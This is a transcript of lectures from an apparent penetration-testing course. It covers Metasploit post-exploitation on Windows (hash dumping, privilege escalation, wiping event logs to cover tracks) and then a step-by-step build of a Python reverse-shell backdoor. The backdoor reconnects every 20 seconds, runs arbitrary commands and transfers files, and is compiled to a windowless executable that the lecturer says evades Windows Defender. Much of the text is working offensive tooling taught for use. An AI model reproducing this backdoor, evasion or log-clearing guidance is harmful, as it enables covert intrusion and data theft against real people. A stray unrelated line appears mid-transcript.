can see that the list goes on and on. So maybe we would want to narrow it down if we were searching for something specific. But right now, we got all of the JPEG files on the target system. Okay, another thing that I want to show you is the usage of post-exploitation modules. How can we do that? Well, if I go and put my session in the background, clear the screen, and since we are on a Windows machine, what we can do to search for the post-exploitation modules is we can type search and then post/Windows. Press enter, and this will list out all 191 post-exploitation modules. And you can scroll through them and see which ones you would find useful. For example, if your target has a wireless card and it connects to the wireless access point, you can use this module, type use and then the module name, show options, and usually these modules will only want the session ID, so they're very easy to run. You can simply just set the session ID to, first of all, let's check out what session ID we have, and it is 1, so set session ID to 1. Then run the program, and this will list out all of the wireless interfaces and possibly the passwords of the connected wireless access points. Now, since my machine doesn't have a wireless interface, it simply just prints out no wireless interfaces. So these post-exploitation modules depend on what you're looking for. So let's scroll a little bit up and see which type of modules we have. So we got a bunch of enumeration modules. You can enumerate Chrome to extract all the Chrome data you can find inside of that browser in case the target is using Chrome. Check for VMs, so you can use this module, for example, to check out whether the target that you managed to hack uses a virtual machine, or if it's a virtual machine. So let's see how that would work. We know that my Windows 10 main machine is not a virtual machine, so it should give out false as a result. So set session 1, run this, checking if my target machine is a virtual one, and it says it appears to be a physical machine, which is correct. You can also be more specific when searching for the post-exploitation module, such as, for example, type search and then passwords. And we can see right here we get some post-exploitation modules for gathering passwords, credentials, total commanders, save password extraction. Let's go a little bit up, see what else we have. Not really too interesting, however, one module that we can use to extract the hashed versions of passwords on a Windows machine is we can type search and then hash dump. Then we can scroll a little bit up and we got somewhere around here a module, here it is, called post windows gather and then hash dump. So let's copy it, type use and then paste the module name. If I type show options, set the session to be 1, as you can see they're very easy to run, only one option is required, and I type run, it will tell me access is denied. So this simply means that I'm not a system level account. We know how we can fix that, so I'm just going to do that real quick, just to show you what this hash dump post-exploitation module outputs once it works. So I'm going to real quick elevate privileges. And here it is, the privilege escalation worked from the second try, and I'm going to type get system background in session and now use post windows gather and then hash dump. Set session to be session 2, because the session 2 in this case is the session with the system level account. And if I type run, this should give me the hashes of all the users on that Windows machine. And here they are. We got the administrator hash, we got the user hash, and we got some other hashes as well. And we could use them to crack them with some other program, but more about password cracking later on in the course. For now, we just managed to extract the hashes. Another useful option that we have that requires system privileges inside of the Meterpreter shell. If I go inside of my system level account shell and I type the help menu, scroll a little bit up, I should see this option called clear EV, and this stands for clear the event log. What does this mean? Well, this command will clear application, system and security logs on a Windows system. So it is something similar to covering up our tracks. How can we run them? Well, it takes no other parameters, so all we need is a system privileged account and we can type clear event. And we can see right here, it is wiping out records from application, system and security. And another thing that I want to show you before I close off this video is that you can run post-exploitation modules even from the Meterpreter shell. So you don't need to always put it inside of the background in order to run a post-exploitation module. You can simply just type run and then the module name. For example, I will use this one, so post windows gather and then enum underscore applications. And if I press enter, what this post module will do is it will print out all of the installed applications on my Windows 10 machine, and we can see them right here. So many different modules exist. We saw there are hundreds of post-exploitation modules. You run all of them the same way, so you can simply just go and search through them and find which one is useful for you. Then you can test them out and see how they work. Great, now that we covered all of this, you have a pretty good understanding of what post-exploitation is. So let's just remind ourselves of the most important things that we do after exploiting the target. We try to elevate our privileges, we create persistence in order to be able to enter that machine whenever we want, and we search for useful information on that target machine, such as password hashes, such as different files that we might find useful, and those are the main parts of post-exploitation module. Of course, you can then use the commands like clear event and other commands that are used to cover up your tracks and delete the log files, which could be useful to cyber forensics in case they want to track back the person that was on that machine. So thank you for watching this video, and I will see you in the next lecture. Welcome back. It's time for a small break. We covered a full penetration test by now. Or you can say we covered how it would look like and how would we perform a penetration test. We went from gathering information about our target, from personal and technical information, to then later performing a scan to figure out the target's infrastructure and if we could find some openings or vulnerabilities to attack. After doing that, we gained access to the target by either exploiting through a vulnerability or delivering a payload that the target will execute. And at the end, we performed post-exploitation with the payload that we delivered. From stealing information with a keylogger to downloading files from their machine or maintaining access. We did all of that. And you can say we completed the penetration testing circle. We did all of this on both Windows and Linux targets, and the next step that you could take is to practice all of these things that we learned on various virtual machines that you can download online and that have different vulnerabilities. Machines that are similar to our Metasploitable. You can also subscribe to different online programs that host vulnerable machines that allow you to test them and advance your skills even more through testing those machines. However, more about all of this I will say at the end of the course. And even after covering all of this, we are still not done yet. We still have more things to cover. Remember when I told you that port 80 is something that we will be attacking later in the course? Well, why port 80? Remember, port 80 is used to host a website, and websites have a lot of different vulnerabilities that we haven't covered yet. So we're going to do that in a section of its own. The next thing that we will cover are going to be the basics of web application penetration testing. And if I didn't mention it already, let me say it again. This is a huge topic. You might have also heard about bug bounties, and that is mostly referred to web app penetration testing. Nonetheless, once we finish that, we're also going to take a look at gaining access to the wireless access points. This will also involve password cracking, which we also haven't encountered yet, and after that we're going to take a look at something not so important but interesting, and that is called man-in-the-middle attack. We're going to see exactly how it works once we get to it, but for now you can just remember it as an attack that will allow us to steal information on a network from other devices connected. So we still have a lot to go. But before we do any of these, I have another surprise for you, and that is another coding project. That's right, it is time to create a tool that will have something to do with all these exploitation things that we covered in last few sections. And for this, I've picked to show you how to code our own payload. I believe this is what most people would want to see. So we're going to code it ourselves. It won't be anything too advanced, but you will get a good understanding of behind the scenes on how payloads and reverse shells work. And by the end of that project, you will have a working backdoor that you can send to the target and execute commands with the help of it on the target machine. Cool, right? now that you know what the surprise is, we're ready to get straight into backdoor creation in the next video. See you there. Welcome to our second coding project. As we already know, we're going to create a working backdoor, and as the previous project was in Python, this one will be as well. However, if we think about it a little bit, you might realize that in order for our project to work, and in order for us to successfully communicate with the target machine using our backdoor, we must create two programs, a server and a payload. One will be running on our Kali Linux machine, and the other one will run on our target machine. What will happen is they will communicate between one another, and from the server we will be sending our instructions that we want our target to execute. Then the payload will send us back an output. So it would pretty much look something like this. Kali Linux machine is running the server program, and the target is running the payload or our backdoor. Once we get to creating these, you will notice that the code of these two programs will be rather similar due to them working together. We will be sending commands from our Kali Linux machine. For example, if we wanted to check out all the files in the current working directory on the target machine, we know that the command for this is dir on Windows and ls on Linux. Once we send that from our server, we would want our target to send us back the response, which will contain an output of all the files and folders inside of that specific directory. Now, that is just an example of one command. We of course want to be able to execute all the commands that we can run inside the regular terminal or command prompt, and we will see exactly how to do that. To code this, we will need knowledge of reverse shells, which we already have since we covered the exploitation section. We know exactly how reverse shells work, and another thing that we must be familiar with are ports and IP addresses, and this is also something that we know. This will not present us a problem. We need to be familiar with Python sockets, and this is something we briefly touched in our first coding project. However, I will do my best to explain it once again in the code that we're going to use. And last, at the end, we will need to compile the Python code to .exe for our Windows targets. This is something you should not worry about, since I will demonstrate how to do this after we code our programs. So now that we know what we are doing, without further ado, let's get straight into the coding lessons. Welcome back. Time to start coding our backdoor. So in this video, we're going to start with the base of our program. Remember that we must create two different programs, a server and a backdoor. And it doesn't matter with which one we start, so let's in this case start coding the server first. We're going to code both of them simultaneously. So what I'm going to do is I'm going to open the terminal, and remember that we have this tools directory from the first project. Let us navigate to there, and instead of the port scanner we're going to make another subdirectory inside of here and call this backdoor. Then we're going to change the directory to the subdirectory, and here we're going to code our tools. So as I said, let's start with server first. To do that, we type server.py. We open it using nano, and here we're going to code our project. So what's the first thing that we must do? Well, since these two programs are going to communicate with one another, they must establish a connection first. And we know that we can do that with the help of a socket library. So socket allows us to initiate an internet connection between two machines. So how are we going to do that? Well, first thing that we must do, and that we also did inside of our port scanner, is we must initiate a socket object. And I'm going to call my socket object sock inside of the server.py. And to initiate it, I will type socket.socket. So we're doing this with the help of the socket library, and here in the brackets we want to specify two different parameters: socket.af_inet, socket.sock_string. And I know what you're thinking, what even are these arguments? Well, this socket.af_inet tells our program that we're going to make a connection over IPv4 address. And the socket.sock stream tells our program that we're going to use the TCP connection. So simple as that. Now, the next thing that we want to do is we want to bind the IP address and the port. This is something that we already did inside of our first project, so there's nothing really too much to explain right here. We just type sock and use the method.bind, open two and close two brackets, and the first parameter is going to be the IP address of our Kali Linux machine. In my case, if I go and check it out, this is .1.12. So I will go right here and specify 192.168.1.12 as the first parameter, and remember it must be between the quotes. Then I will specify comma, and the port that we're going to use, well, we can just go with port 5555. Why not? It doesn't even matter, to be honest. After we do all of this, we binded the IP address with the port, and now the next thing that we must do is we must start listening for the incoming connections. Remember, this was the crucial part in the reverse shells. The target executes the payload, but we must listen for the incoming connections. And that is exactly what our server program will do. It will listen for the connections, and once the target executes a payload, they will connect to our server program. So to do that, we can first print like this. Let us print listening for the incoming connections, just so we know at which part of the program we are. And below that, we can type sock.listen, and we're going to specify 5 in the brackets, meaning that we're going to listen up to 5 different connections. Okay, so our program will now be stuck on this part until the connection is established. Once the target tries to connect back to us, we need to store their connection in a few variables. In other sense, we need to store their socket object that we're going to use to communicate with the target, and we're also going to split that into an IP address. So what I'm going to do is I'm going to type target, IP. These are going to be 2 separate variables, and they're going to be equal to sock.accept. And this accept method is simply just accepting the incoming connection and storing the target's socket object right here and the IP address in the second variable. Simple as that. Once we do that, and once the connection is accepted, we can print that target connected, and we can add from. And what we're going to do here is we're going to close the quote and add a plus sign and then the string of the IP variable. And once again, remember, the IP variable will store the IP address of the target. So what we're essentially doing right here is we're printing that we got the connection from the target's IP address. Okay, we need to close one more bracket right here. And what we're going to do at the end is we're just going to enter a function called target communication. Now, of course, this function doesn't exist and we're going to code it in some future video, but for now on, let's just leave it right here. We successfully created a socket object, binded the IP address with the port, we listened for the incoming connections, and at the end we accepted the connection from our target system. We're going to leave it at this for now on our server program, and let's go to our backdoor program. Now we need to figure out the code for our backdoor to make it connect to our server.py. So first thing that we're going to do is, of course, to import the socket library. Then, as in the server program, we need to initiate the socket object, and I'm not going to call it sock right here, I'm just going to call it s. And here we're going to specify the same parameters, socket.af_inet, socket.sock_stream. We already explained what these are, and the only thing that we need to do right here is we need to connect to our target machine. But we're not going to use the connect method right here. What we're going to do is we're going to call the connection function. And of course, this is a function that doesn't exist, so we must code it up here. Let's define it first. So define connection, it will take no parameters between the brackets, and what we're going to do is we're going to type right here try, which is the try statement, so it will try to connect to our Kali Linux machine, and remember the connect function requires 2 open and 2 close brackets, the same way that the bind function does, and it also takes two parameters, which the first one is the IP address of the machine that we want to connect to. So this will be the IP address of Kali Linux machine once again, and the port will be once again the port 5555 because we want to connect to that port, since our server program will be listening on that port. If it manages to connect, we're going to enter a second function which is going to be called shell. And this shell function also doesn't exist, we're going to code it, and what will be the purpose of this shell function is executing the commands. So for now on, we're just going to leave it right here, and we're going to code it later. Once we leave the shell function, we can close the socket object, and in the accept statement, we can call again this connection function. Now you might be wondering, why are we doing this? Well, if I add something like this right here, so I go and type while true, which is, remember, the infinite loop, and I tab all of these commands once, so they can belong to the while true loop. And right here I'm going to also add a statement time.sleep. And give me just 1 second, I will explain why I'm doing this. Let me just code the function till the end. I will break right here and I will import the time library because we're going to need it since we use it right here. So what are we doing right here? We're calling the connection function. This connection function starts an infinite while true loop. This infinite while true loop sleeps for 20 seconds and then it tries to connect to our Kali Linux machine. If it manages to connect, it will go inside of the shell function where we will execute the commands on the target system. If it doesn't manage to connect, it will go into this accept statement and it will call the same function once again. So what does this tell you? It will run this function infinitely until it manages to connect. So this is good because of one reason. We don't want our target to start the payload and not be able to connect just because we haven't started the server yet. We want to be able to connect to the target system whenever we want. So this function will tell the payload to try to connect to every 20 seconds. Every 20 seconds while their machine is running, this program will try to connect to our Kali Linux machine. So we can start the server at any point of time and after 20 seconds it will establish a connection to us. So this is just calling this function over and over again until this line right here works and they connect to us. Then we enter a second function which is the shell function. Okay, this is the base of our backdoor.py. Here is how we're going to connect to our server, and in the next video we're going to see what we're going to do with the contents of the shell function, and if I save this, Ctrl O, and also the target communication function. So these are the functions that will receive and execute commands. Feel free to post any question if you have about the code, if there is something that you do not understand, and in the next lecture we're going to continue with the coding of our programs. See you there. Welcome back. Let's continue with our programs. So in the previous video we managed to establish a connection between these two programs. Or we didn't really manage to establish, but we created a part of code that will establish the connection once we run these programs. Now let us go to our server program first and let's figure out this target communication function. Remember, this function will send the commands to the target system that we want to execute, and it will also receive the response of the target system. So let us code it up here, and we're just going to start it, and then we're going to go to the backdoor program. First thing that we're going to do is we're going to initiate the function. So define and then target_communication. As we can see, it takes no parameters, and what we're going to do straight away inside of this function is we're going to enter an infinite while true loop. What we will essentially do here is we're going to ask for a command from the user of this program, and then we're going to send that command to the payload and go back to the beginning of this while true loop once we receive the response. Let me show you what I mean. Inside of here, the first thing that we want to do is we want to initiate a command. Since we don't know what command we want to execute, we're just going to use an input statement that will allow the user of this program to type in the command. And we're going to write it like this, let's make it pretty. Let's make it look like a terminal. And move this sign, %s, and you're going to see why we're using this %s in just a second. So after the %s, type 2 dots and then empty space and add a single quote at the end. And here you can add another % and string of IP address. And if you don't know Python, you're probably wondering what even happened here. Well, this is a statement that will print out. And once we type this %s, it will get exchanged with this string of IP address. And remember, our IP is simply the IP address of the target system that we initiated in this line right here. So what this will print is it will print the shell, and then after it the IP address of the target machine, and then 2 dots, and here we will be able to type in our command. We just made it look a little bit prettier once we run the program. So the next thing that we want to do is then send that command. And we're going to use a function that I'm going to call reliable send, and this function also doesn't exist. It will take one parameter, which will be the command itself, so we're sending the command to the target. Now this reliable send function is something that we will code in the next lecture. For now, just picture it as the function that will send this command to the target system. Then, right here, after we send the command, we want to check out what this command was. For example, let's type if command equals to quit. Then this will initiate to our program that we want to exit out of the shell, and we want to exit this program. So we're just going to break out of this while true loop, and that will end our program. So remember, once you type quit, that means you want to stop communicating with the target system and you want to close this server program. So we're going to break out of the while true loop, and that will exit out of this target communication function, and then it will exit out of the program. If it is not quit, so else, we're going to type right here result equals and then reliable underscore receive. And this function is also something that we'll create in the next lecture. For now on, just picture this function right here as a function that will receive the response from the target after the target runs our command. Then we're going to store the response inside of this result variable, and we want to print the result. Simple as that. So let's go through this real quick once again. We're asking for the input of the command, then we're sending that command to the target. We check if the command was quit. If it was, then we exit the program. If it wasn't, then we store the response of the command that we received using this function to this result variable, and then we print out the result. For example, if the command was ls or dir, that command lists out all of the files and folders inside of a directory. We would then store this inside of this result variable, and then we would print out all of the files and folders inside of the target's directory. Simple as that. Now that we did this, let's go to our backdoor program and code something similar. Just inside of this backdoor program, we do that using the shell function. So what I'm going to do is I'm going to go below the connection function, and right here I will initiate the shell function. And as our target communication function, the shell function will also start with a while true loop. Then what we're going to do is we're going to create the command variable, and in this program, this command variable will receive the command that our server sent. So in backdoor, we first receive the command. Then, after we receive the command, we check if that command was quit, the same thing that we did in our server, and in the same way, we're going to exit out of the program by breaking out of this while true loop. And the other case, we want to execute the command. But this is something that I'm going to type as a comment for now. So here in the else statement, we want to execute the command. And the reason why I'm not typing it right now is because this execution of command requires another library we're going to touch on as soon as we finish coding these reliable receive functions and reliable send functions. So first we need to code them, and then we're going to go and type the code of the command execution. So for now we just started the base of our shell and target communication function, and we're going to continue coding them in the next lecture. See you there. Welcome back. Now that we covered our shell and target communication functions, it is time we employ the reliable send and reliable receive functions. So if I go to my server code right here, you will notice that we did code a part of the target communication function, but this is not really working. These functions do not exist. We must create them first in order to be able to successfully send and receive data. Let's start with the reliable send function first. Since that one is easier, we just need to send the data. And for this, we're going to use the JSON library in order to more easily parse the data. So down here, I'm going to define reliable_send, and reliable send will take one parameter. As we can see right here, it has to be the data that we're going to send, so we're just going to name that parameter data. Then let's add two dots, and inside of the function, we're going to define something called JSON data. And this is going to be a variable that is going to store the output of the dumps method from the JSON library onto our data. Now keep in mind that this data is the actual command in our case, since inside of the target communication function, once we call the reliable send, it parses the command inside of the brackets. So you can just change those commands to be this data right here. Then we perform the JSON dumps onto that command and we store it inside of JSON data. And finally, we can use the send function from the socket library onto our target to send the actual data. So we can type JSON data. And just to remind you, this target is the actual target socket object that we get once we accept the connection. We're just using a socket send function onto this target object once we're sending the data. But one more thing before we finish with the reliable send function is that in Python 3, once we are sending the data over sockets, we need to encode that data. So we can do that by simply specifying inside of the brackets our data and then encode function onto it. Then it will first encode the data and then it will send it with the send function. Simple as that. Now the same thing we need to do with our reliable receive, so I'm going to code it right here, reliable receive, and we know that the reliable receive doesn't take any parameters inside of the brackets. And what we're going to do to receive the data is we're first going to define a variable to be an empty string. We're just going to call it data. And we're going to then enter inside of the infinite while true loop. Inside of that loop, what we're going to try is we're going to try to get the data by typing data equals data plus target.receive. And just to remind you, the receive function is the function from the socket library, so we're just using it once again onto our target connection. And this receive function takes one parameter. That is the amount of bytes that we want to receive. In our case, we're just going to specify 1024 bytes. But this is not everything that we must do. Remember that once we are sending the data, we actually encode the data? Well, in order for us to get the data as it was before it got encoded, we must then decode the data once we receive it, right? And at the end, we're going to add a strip function onto all of this. Okay, great. After that, once we receive the data, we can return from this function the JSON.loads of our data. And this is just the format that we're going to output it. Since remember, we must return from this function as it does get stored inside of a variable. Our result will be our data. And in the accept statement, of course, we must not forget that. So I'm going to go down here and add accept. And what we're going to accept is the value error. So in case we get the value error, we're simply going to continue with the execution. So once again, what is this function doing? Well, it initiates a data variable to be empty string. Then we try to get 1024 bytes from our target. We add it to the previous data that we received. Then we decode that data, of course, before adding it, and then we strip it from any additional characters. We then return the JSON loads of that data, and that will be stored inside of the results variable that we then print to our screen. So all we need to do right now is we need to add these two functions to our backdoor code as well. So copy them, save the server code, and then nano backdoor, go up here, and paste the functions. However, there is one thing that we must change, and that is this target.send right here. Since we're not sending to the target from our backdoor, we're sending to the server, and we initiated the socket object to be S. So this is our only socket object, and we're going to use that to send our data. The same thing we want to do inside of the reliable receive function. We are not receiving from the target using the S socket object. Since if we left here target is undefined inside of our backdoor code, therefore it will throw us an error. Everything else can stay the same. And now that we got these two functions ready, in the next video we're going to write the part of the code that will execute the command. It is once again stored in this else statement right here. We for now on just put the comment, and in the next video we're going to use the subprocess library to perform the action of executing the command. See you in the next video. Welcome back. Time to write the code that will execute our commands inside of our payload. So as I already mentioned, for this we're going to need an additional library. So go to your backdoor program and import subprocess. This library will allow us to execute any command that the server sends. Let's go down here, where we added a comment for the command execution. We can delete it right now, and to execute the command we can do something like this. We can initiate, execute, and we're going to equal that to the subprocess dot be open, and this stands for process open. This process open takes a few parameters, and the first one will be what we want to execute. In our case, we want to execute our command. The second parameter we can select to be shell equals true. And there are some additional parameters such as stdout equals subprocess.pipe, and make sure that you type this pipe in the capital letters. Another parameter stdr equals subprocess.pipe, and the last one will be stdin equals subprocess.pipe. These are all the parameters that we need to specify right here. The most important one is that you specify this command as a first argument. Once we initiate the process open onto the execute, we can create a variable called result that will be equal to execute stdout.read. So we want to read the output. We're also going to concat to this the execute stdr.read. So these are the two things that will give us an output of the command. Then we will store them inside of the result variable, and this line that I'm going to write right now could be a little bit tricky. Let me write it first. Result.decode. You might be wondering, why are we decoding this? Well, if I go up here, in the reliable send, we're going to encode our data, and this result is something that we're going to send in the next line. And once we perform these two lines, we already get an encoded data. So if we don't decode it first and we try to send it straight away, it will throw us an error. It will not be able to do that because it is going to try to encode unencoded data. That's why first we must decode it right here, and then in the next line we're going to type reliable underscore send, and we're going to send our result. Great, now that we did this, let us test our program. And to test this program, you're going to need a Windows environment to compile it, and you're going to need any version of Python 3. Now, in my case, I'm using Python 3.7. So I would advise you to use the same version, so just download the Python 3.7, because if it works for me, it will most likely work for you. After you do that, what we must do is we must copy our backdoor to our Windows 10 machine. Why? Well, we're going to compile it on a Windows machine. For this you can use a Windows virtual machine if you'd like, just make sure you download Python 3.7 onto that Windows virtual machine. Once you do that, you can copy the backdoor. I am first going to copy it to my Cal Linux desktop. So home Mr. Hacker and then desktop, and from the desktop I'm going to copy it onto the Windows 10 desktop. Great. Now that we copied it, we're going to need a few things in order to compile this program. So first of all, open your command prompt on your Windows machine, navigate to the directory where your backdoor is, and to compile this program, we're going to need a Py installer library. You can install that library using pip, as usual. Once you get the Py installer library, you want to go to the directory where your backdoor is and type pyinstaller, then the name of the program, in my case backdoor.py, and we're going to use two different arguments. One of them is one file and the other one is no console. Once you specify all of this, press enter, and this will compile our Python program for us. Now, one thing to keep in mind is that you must have all the libraries from this program installed using pip in order for the compiling of the program to be successful. So in this case, our backdoor right here, if I edit it using Notepad, we only have these three libraries, and all of them are already by default in Python, so there is no libraries that we must install yet. But in future, if you keep adding onto this program and you add additional libraries that might not be by default installed in Python, you will need to install them first using pip, and then you can compile the program successfully. Okay, great. Now that we compile the program, we're going to have these four folders. We're going to have the dist folder, this PyCache folder, this backdoor.spec file, and the build folder. These three right here you can delete straight away. We don't need it. And this dist folder will have our executable. Here it is. It is called backdoor.exe. And you know what is the cool part? If I scan it using the latest version of Windows Defender,
Are you afraid of the dark? Are you scared?
here it is, 0 threats found. So we created an undetectable backdoor that we coded. Amazing, right? Now to test it to see whether it works, first thing that we must make sure is that the IP addresses and the ports are set correctly, and that is something that we should have done before actually compiling the program. But in my case, I remember that I set the 192.168.1.12 to be the IP address of Cal Linux machine, and the port 5555 to be the port to connect to, which is in my case correct. So what I'm going to do is I'm going to use Python 3 to start my server. It will print out listening for the incoming connections, and if I go right here, execute the backdoor.exe, nothing seems to be happening, but that is good. We don't want our program to open anything. But if we go back to here and we wait a couple of seconds, because remember that we set the time.sleep command to be 20 seconds before actually connecting to our Cal Linux machine, and after 20 seconds, here it is, we get the shell from our Windows 10 machine. We get shell written and then the IP address as well as the port from which the connection is coming from. Now if I try to execute some of the command prompt commands, such as for example who am I, it seems to be stuck, so there is something wrong with our code. Let us go and check our server first to see whether everything is good. So we got our reliable send and reliable receive functions, everything seems to be good. But right here we reliable receive the result and then we print it out, so this could be the problem. Let's check it out inside of our backdoor code as well, just to make sure that everything is good here. And after a few minutes of searching, I managed to find the error. So the error was inside of the backdoor code. The first thing that I didn't do is I didn't import this JSON library inside of my backdoor code. I only copied these two functions from the server code, but I forgot to import the JSON library. So that is the first thing that we must do. I already did it right here. And the second thing is the typo right here in this line. We typed rstrip and it should be rstrip. We need to fix that both here and inside of the server code. So go down here and change the R stip into R and then strip. Save right here as well. And we're going to copy the backdoor.py to the home Mr. Hacker and then desktop. So we're going to recompile it once again. All of these things we do not need anymore, so I'm going to delete them. If it tells you right this that the file is currently in use, that is because we ran it, and to close it we can go to Task Manager, find the backdoor.txt that is running and close it inside of our Task Manager. Then we should be able to delete the dist folder. Great. Now that we did that, what I'm going to do is I'm going to once again copy the backdoor.py onto my desktop, and I'm going to compile it once again using the command prompt. So py-installer backdoor.py --one file and --no console. Press enter. While this is compiling, let us go to our Kali Linux machine and let us start our server. Python 3 server.py, it will listen for the incoming connections, and right here we can go to the dist directory and execute backdoor.txt. Once again, these other files we do not need, so you can delete them, only leave this directory with the backdoor.txt. And in just a few seconds, we should receive the connection right here in our Kali Linux machine, due to the timeout of 20 seconds that we coded inside of our program. And if I type who am I right now, it works. I can execute commands on the target machine. If I type dir, it will tell me that the only file in the directory is backdoor.txt, and that is because we're currently inside of this dist directory. If I type ipconfig, it will tell me my IP address. I can type the netstat command to get the netstat output, where it will tell me all of my current connections on that target machine. But if I, for example, try to go one step back, this will not work. I will still be in the dist directory. So it seems that our program works, we can execute the commands, but for now on we can't seem to change the directories into a different directory. And that is something that we must see how to fix in the next video. But for now on, it is good that it works. We saw how we can compile the program to exe using py-installer. So once again, just install Python 3.7 on a Windows machine, install py-installer for the Python, and install all the libraries that you're using inside of your program. In our case, we are not using any additional libraries outside of the standard Python libraries, so we didn't need to do that. Only thing we needed to do is to install py-installer and then use the command py-installer, program name, one file, and no console as options. And this should compile the program for you. Once you execute it, it should connect to the server that we're running from our Kali Linux machine. And let us test the quit command. If I press enter, it closes the program right here in our terminal. But does it also close the program in Task Manager? Let us check it out. And it indeed does. So we also close the program on the target machine with the quit command. Great. In the next video, we're going to see how we can successfully change directories using our program. Welcome back. Let us see how we can implement the changing of the directory inside of our server and backdoor. So, in the previous video, we tested our program for the first time and we were able to execute all of the commands. But once we tried to change the directory on the target system, we weren't able to do that. We were stuck in the same directory. So let us see how we can bypass this and how we can be able to change the directories inside of our backdoor code. The first thing that we must do is we must nano our backdoor, and down in the shell function, here we must add an option if the command starts with cd. First, Python has a library that is called OS library, and with the help of the OS library, we can change the directory with just one single command. So first thing that we must do is we must import that library. Go up here and import OS. Once you do that, down here in the shell function, here we must add the command or the statement, which will say else if command, and then equals to cd empty space. Then we will change the directory. But you might notice that there is something wrong with this statement right here. For example, we are comparing the command with cd and empty space, but most likely the command will be something like cd and then desktop. So if it compares this with this, these two will not be the same, even though they start the same. So what we must do instead of comparing the entire command, we must compare just the first 3 characters. And we can do that by specifying square brackets and then 2 dots up to 3rd character. In other words, all of this just means that we are comparing the first 3 characters of the command with cd and empty space. And empty space is the reason why we're comparing 3 characters and not 2. After we compare this and they do match, then we can use the OS library and function which is called chdir, which stands for change directory, onto the command, and then right here we need to do the quite opposite thing that we did, which is from the 3rd character and then till the end. Since this function will be something like this. If we run the command cd desktop, then this function will do something like this: os chdir and then desktop. So what we essentially did is we compared this, and then if they did match, we then used this part of the command to change the directory. And this is pretty much it. We don't need to add anything else. This will change the directory for us. However, this is not everything that we must do. What else we must do is we must go to the server code and add the same command inside of our target communication function. So right here, we can add another else if statement, else if command equals to cd, empty space, and here remember that we also must add from the beginning up to 3rd character. Just in this case, we are not going to do anything. We're going to just pass. Because in server, we don't want to do anything, we just want to go back to the beginning where we can send the next command. And in the backdoor code, we simply just change the directory of our program. Now, there is one more command that I want to add in this video, and that is the clear command. This is not really that useful, but once you have a bunch of commands and outputs on your desktop, you can use something similar to this that we use right here. So if I, for example, type sudo ifconfig, and it outputs me with the ifconfig command, I can just type clear to clear the screen. So let us do something similar inside of our code. First, we're going to go with the server, and if we send the command clear, this command will get sent to the target. However, we want to execute it right here inside of our server, since there is no point in executing the clear command inside of our backdoor code on the target system. So what we're going to do right here is we're going to add another else if statement, else if command equals to clear. We're going to use once again the OS library, and we're going to call the system command which will execute the clear command. This system function allows us to specify any command in the brackets which will then get executed inside of our terminal. Of course, since this is inside of a server code, we must import the OS library here as well. And since the command will get sent to the backdoor as well, we want to cover that step also inside of our shell function. So let us go right here and add else if statement command equals to clear. Just in this case, we will pass and not do anything. Okay, simple as that. And these are just 2 commands that I wanted to cover in this video, which only this cd command is really important for us right now. But in the next video, what we're going to do is we're going to see how we can download and upload files to the target system. Then at the end, we're going to test our final version of program and see whether all of these commands that we imported work, or if there is something that we must change. So for now on, we got execution of the command, changing of the directory, we can clear the screen if we got too many things happening, and we can quit outside of the shell. Great. Let us continue coding in the next lecture. Welcome back. Time to code our download and upload functions. So for now, we coded a bunch of different options such as executing commands, quitting out of the shell, changing directories, clearing the screen. But let's also see how we can create 2 functions that will allow us to download and upload files on the target machine. So let's start with server first. I'm going to navigate to my tools and to the backdoor directory. Here I will nano our server, and inside of the server down here we want to code the download function first. So download function will be used to download the files from the target machine. And the reason why I'm saying this is because even though it is obvious, from our server we will be downloading files, but from our backdoor code we will be uploading files. What do I mean by that? Well, since backdoor will be running on the target system, for that machine the code will upload a file to our server, while from our server perspective we will be downloading that file to our Kali Linux machine. So inside of the server, here we want to add an option else if the command and then first 8 characters. And you might be wondering why first 8 characters? Well, because download has 8 characters. And we're comparing if the command starts with download, then we're going to download a specific file. And to do that, we're going to use download_file function. This function will take the parameter of the file name, so we're going to type command and from the 9th character till the end. Of course, this function we're going to code right now, but just to clarify why I wrote it like this is because, once again, if the command is something like this, download file.txt, we're comparing first 8 characters, if they're equal to download. If they are, that means we're downloading a file, and then we will paste this to this download file function, since we're going to strip first 9 characters off, which will be the download word and the empty space. Okay, now that we did this, let us code the download function up here. So we're going to code it below the reliable receive. Let us define it first, so define download_file. As we already know, this function takes one parameter, which is the file name. And this is going to be a little bit of a harder function to code, but let's give it a try. We're going to start like this. We're going to initiate a file object, and how we do that in Python, we simply specify the file object name and then we open it. But besides of opening it, we must specify the way we want to open it, whether we want to open it for reading or for writing. That is a second parameter to this open function. In this case, since we're going to download a file, we want to write the content that we receive from our backdoor to the file that we create on our Kali Linux machine. Therefore, inside of our server code, we want to write bytes. So what does this mean? Well, we're opening this file object to store the contents of the file that we want to download. That's why we're going to write that content. And this W stands for write, while this B stands for bytes. So we're essentially writing bytes to our file. Then another thing that we must add is the target.setTimeout. This is a cool function that we get from the socket library, and we're going to set the timeout to be 1 in this case. Why? Well, sometimes if we don't set the timeout, it might actually get stuck and not allow us to download the file. Of course, this timeout is something that at the end of this function we must remove, so it doesn't interfere with other commands and connections. But for this function, we must set the timeout so our program doesn't crash. Great. Once we initiate the timeout, we're going to initiate a variable called chunk, and this chunk will be a small parts of data that we're going to receive multiple times. So we're going to type target.receive, and we're going to specify inside of the brackets amount of bytes that we want to receive. In this case, we're going to use 1024 bytes. So how are we going to keep receiving data until the file size is over? Well, we can just type while chunk, and this while chunk will simply run this while loop as long as there is something inside of the chunk variable. And if there is something inside of the chunk variable, we want to write that something to our file, and we do that using our file object that we called f, and using the write function onto that object. So file.write, and we are writing the chunk inside of that file. Then after we write that, we're going to try to receive the chunk once again. So chunk equals target.receive. We're going to go with the 1024 bytes once again. And if we run into a timeout, so socket.timeout as error, we are going to simply break out of this while chunk loop, because that would mean that we reached the end of the file. And at the end, let's not forget to set the timeout to non-existent. So we can do that by specifying target.setTimeout to none. We're simply just removing this statement right here that we initiated at the beginning of the download file function. And the one last thing that we must do is anytime that we open a file object, once we are finished with that object, we must close it inside of our function. So I will just type f.close. Great. This is our download file function that we're going to run inside of the server code. Now let's see how we can create the correspondent function to this inside of the backdoor code. Remember, from here we're downloading a file, but from the backdoor we are uploading a file. So what we must do right here is inside of the shell function we must add an else if statement. So else if command, first 8 characters are equal to download. We're doing the same thing that we did in our server, just here we're going to call upload file onto the file name, so from the 9th character till the end. Since our backdoor is uploading a file, the function will be quite a lot easier to code, so let us go up here and below the connection function we can define upload file. This of course will take file name as the parameter, and only thing we need to do is open the file that we want to upload to the server. In this case we're going to define the file name as the first parameter, just as we did inside of our download file in the server code. Just this time we're going to read bytes from this file. Why? Well, from the backdoor we're not writing or storing a file onto the system. We're simply just reading the contents of the file that the server 